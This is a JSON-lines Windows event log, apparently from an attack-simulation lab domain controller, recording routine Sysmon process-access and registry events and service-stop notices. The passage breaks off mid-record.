{"EventTime":"2020-08-01 07:57:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4079,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:07.886\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:07.886","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4080,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:07.886\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:07.886","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4081,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:07.886\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:07.886","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4082,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:07.886\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:07.886","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4083,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:07.886\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:07.886","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4084,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:07.886\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:07.886","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4085,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:07.902\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2053-5F25-0000-0010F91A0600}\r\nTargetProcessId: 4800\r\nTargetImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:07.902","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2053-5F25-0000-0010F91A0600}","TargetProcessId":"4800","TargetImage":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76862,"ProcessID":856,"ThreadID":948,"Channel":"System","Message":"The Windows Insider Service service entered the stopped state.","param1":"Windows Insider Service","param2":"stopped","EventReceivedTime":"2020-08-01 07:57:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76863,"ProcessID":856,"ThreadID":948,"Channel":"System","Message":"The Update Orchestrator Service for Windows Update service entered the stopped state.","param1":"Update Orchestrator Service for Windows Update","param2":"stopped","EventReceivedTime":"2020-08-01 07:57:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4086,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 07:57:18.746\r\nProcessGuid: {41C8662E-2053-5F25-0000-0010F91A0600}\r\nProcessId: 4800\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Updating\r\nDetails: WmiApRpl","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 07:57:18.746","ProcessGuid":"{41C8662E-2053-5F25-0000-0010F91A0600}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Updating","Details":"WmiApRpl","EventReceivedTime":"2020-08-01 07:57:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4087,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 07:57:18.762\r\nProcessGuid: {41C8662E-2053-5F25-0000-0010F91A0600}\r\nProcessId: 4800\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Last Counter\r\nDetails: DWORD (0x00006322)","Category":"Registry value set (rule: 